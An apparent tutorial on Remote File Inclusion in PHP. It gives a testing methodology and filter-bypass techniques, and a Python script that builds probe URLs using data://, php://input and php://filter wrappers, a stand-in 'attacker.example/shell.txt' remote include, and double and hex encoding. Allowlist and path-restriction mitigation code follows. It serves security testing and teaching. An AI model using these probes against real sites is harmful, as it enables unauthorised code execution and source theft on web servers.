Remote File Inclusion attack

What is RFI (Remote File Inclusion)?

1: Remote File Inclusion: the application builds the path for include()/require() from user input without restricting where the file may come from.

2: Include another server's files: the attacker supplies a URL, so the web server fetches a file hosted elsewhere and includes it.

3: Vulnerable parameter: the input that reaches the include call, typically a page, file or template selector in the query string.

4: Upload/execute malicious code: the included file is interpreted as server-side code, so the attacker's script runs with the web server's privileges.

RFI (Remote File Inclusion) Methodology?

1: Find parameters: PAGE= FILE= TEMPLATE= LOC= URL= (any parameter whose value looks like a file name or path).

2: Test external URLs: point the parameter at a host you control and look for an outbound request from the target, or for the fetched content in the response.

3: Detect security controls: input validation and sanitization, firewall protections, configuration settings (allow_url_include), file and directory controls.

4: Bypass techniques: protocol smuggling, encoding techniques, PHP stream wrappers, host-based attacks, obfuscation techniques.

Protocol Smuggling:

1: FTP (ftp:// instead of http:// when only HTTP is blocked).

2: SMB/CIFS (a UNC path such as \\host\share\file on Windows hosts).

3: DNS (out-of-band: a lookup of a name you control confirms the server resolved your URL even when nothing is fetched).

Encoding Techniques:

1: Base64 (for example inside a data:// wrapper, or to read source with php://filter).

2: Double URL encoding (%252e%252e%252f becomes ../ only after the second decode, past a filter that decodes once).

3: Hex encoding (%XX-encode every byte of the payload so keyword filters do not match it).

PHP Stream Wrapping:

1: data:// wrapper (inline base64 PHP; requires allow_url_include=On).

2: php://input wrapper (the raw POST body is included as code; requires allow_url_include=On).

3: php://filter wrapper (convert.base64-encode returns a file's source instead of executing it; works with allow_url_include=Off).
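The encoding techniques and PHP stream wrappers above, as one added example (not code from the original post): it builds the values a tester would put in a suspected parameter such as ?page=, and includes the check that tells execution apart from mere reflection. The base URL, parameter name, attacker host and the PHP probe are constructed for illustration.

```python
"""Probe values for a suspected RFI parameter: wrappers and encodings.

Added example (not code from the original post). Base URL, parameter
name and remote host are assumptions; the PHP probe is constructed here.
"""
import base64
import urllib.parse

# Constructed probe: the marker is concatenated at runtime, so the literal
# "RFI_MARK" appears in a response only if the PHP actually executed,
# not if the server merely reflected our input back.
PROBE_PHP = '<?php echo "RFI_" . "MARK"; ?>'


def data_wrapper(php_code: str) -> str:
    """data:// wrapper carrying base64 PHP (needs allow_url_include=On)."""
    b64 = base64.b64encode(php_code.encode()).decode()
    return f"data://text/plain;base64,{b64}"


def php_input_wrapper() -> str:
    """php://input includes the raw POST body (needs allow_url_include=On)."""
    return "php://input"


def filter_wrapper(path: str) -> str:
    """php://filter with convert.base64-encode returns the file's source
    instead of running it; works with allow_url_include=Off, so it is the
    usual way to read config files through the same parameter (LFI)."""
    return f"php://filter/convert.base64-encode/resource={path}"


def decode_filter_response(body: str) -> str:
    """Decode the base64 that a php://filter read returns."""
    return base64.b64decode(body).decode()


def double_url_encode(value: str) -> str:
    """Encode twice: a proxy/WAF that decodes once sees %2F, the
    application decodes again and sees the real slash."""
    once = urllib.parse.quote(value, safe="")
    return urllib.parse.quote(once, safe="")


def hex_encode(value: str) -> str:
    """%XX-encode every byte, including letters a keyword filter matches on."""
    return "".join(f"%{b:02x}" for b in value.encode())


def executed(response_body: str) -> bool:
    """True only if the probe ran (see the PROBE_PHP comment)."""
    return "RFI_MARK" in response_body


def build_probes(base_url: str, param: str = "page",
                 remote: str = "http://attacker.example/shell.txt") -> dict:
    """Return {variant name: full URL} for each probe variant."""
    raw = {
        "remote_url": remote,
        "data_wrapper": data_wrapper(PROBE_PHP),
        "php_input": php_input_wrapper(),
        "filter_wrapper": filter_wrapper("index.php"),
    }
    # One URL-encoding pass so '+', '/', '=' in the base64 survive the query.
    encoded = {k: urllib.parse.quote(v, safe="") for k, v in raw.items()}
    # These variants are already transport-encoded; do not encode them again.
    encoded["double_encoded_remote"] = double_url_encode(remote)
    encoded["hex_encoded_remote"] = hex_encode(remote)
    return {name: f"{base_url}?{param}={value}" for name, value in encoded.items()}


if __name__ == "__main__":
    for name, url in build_probes("http://target.example/index.php").items():
        print(f"{name:24} {url}")
```

The php_input variant must be sent as a POST with PROBE_PHP in the body; the others are plain GETs. Run decode_filter_response() on the body returned for the filter_wrapper variant to recover the source of the target file.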

Host-Based Attacks:

1: Localhost testing (point the parameter at 127.0.0.1 or the server's own hostname to reach what only the server itself can see).

2: LFI (when remote URLs are blocked, the same parameter often still includes local files, such as logs or uploaded content).

Mitigation:

1: Input validation and sanitization: allowlist the trusted page names and map them to fixed paths; merely removing characters such as ../ is bypassable (a single pass turns ....// into ../).

2: Firewall protections: block outgoing HTTP requests from the web server so it cannot fetch attacker-hosted files, and put a WAF running the OWASP Core Rule Set (CRS) in front of it.

3: Configuration settings in php.ini: allow_url_fopen=Off and allow_url_include=Off (allow_url_include is Off by default and disables http://, ftp://, data:// and php://input in include/require).

4: File and directory controls: restrictive file permissions and a root restriction, for example open_basedir=/var/www/html/, so PHP cannot open files outside that tree.
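The input validation and root restriction from the mitigation list, as an added example (not code from the original post): it contrasts the naive "remove ../" sanitizer with an allowlist plus a root check of the kind open_basedir enforces. WEB_ROOT and ALLOWED_PAGES are constructed for illustration.

```python
"""Mitigation: allowlist + root check for a file-selection parameter.

Added example, not code from the original post. WEB_ROOT and
ALLOWED_PAGES are assumed values for illustration.
"""
import posixpath

WEB_ROOT = "/var/www/html/pages"              # assumed include directory
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed trusted page names


def strip_dotdot_once(value: str) -> str:
    """Naive sanitizer: delete '../' in one pass. '....//' collapses to '../'."""
    return value.replace("../", "")


def naive_resolve(value: str) -> str:
    """The path the naive sanitizer actually ends up opening."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, strip_dotdot_once(value)))


def is_remote(value: str) -> bool:
    """Reject anything carrying a scheme or UNC prefix: http://, ftp://,
    php://, data:, \\\\host\\share, //host. Compared case-insensitively."""
    lowered = value.lower()
    return "://" in lowered or lowered.startswith(("data:", "php:", "\\\\", "//"))


def rooted_resolve(value: str):
    """Root restriction: resolve the value and require the result to stay
    under WEB_ROOT. Returns None when it escapes or is not a local file.
    An absolute value such as /etc/passwd replaces WEB_ROOT in join(),
    which is exactly why the prefix check is done on the normalized result."""
    if is_remote(value):
        return None
    path = posixpath.normpath(posixpath.join(WEB_ROOT, value))
    if not path.startswith(WEB_ROOT + "/"):
        return None
    return path


def allowlist_resolve(value: str):
    """Preferred control: only known page names, mapped to fixed paths,
    with the root check kept as defence in depth."""
    if value not in ALLOWED_PAGES:
        return None
    return rooted_resolve(value + ".php")


if __name__ == "__main__":
    attack = "....//....//....//....//etc/passwd"
    print("naive sanitizer opens:", naive_resolve(attack))
    print("rooted resolve      :", rooted_resolve("../../../../etc/passwd"))
    print("allowlist resolve   :", allowlist_resolve("about"))
```

rooted_resolve() is the fallback for applications that cannot enumerate their pages; allowlist_resolve() is what to reach for first, because a value that is not a known name never touches the filesystem at all.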
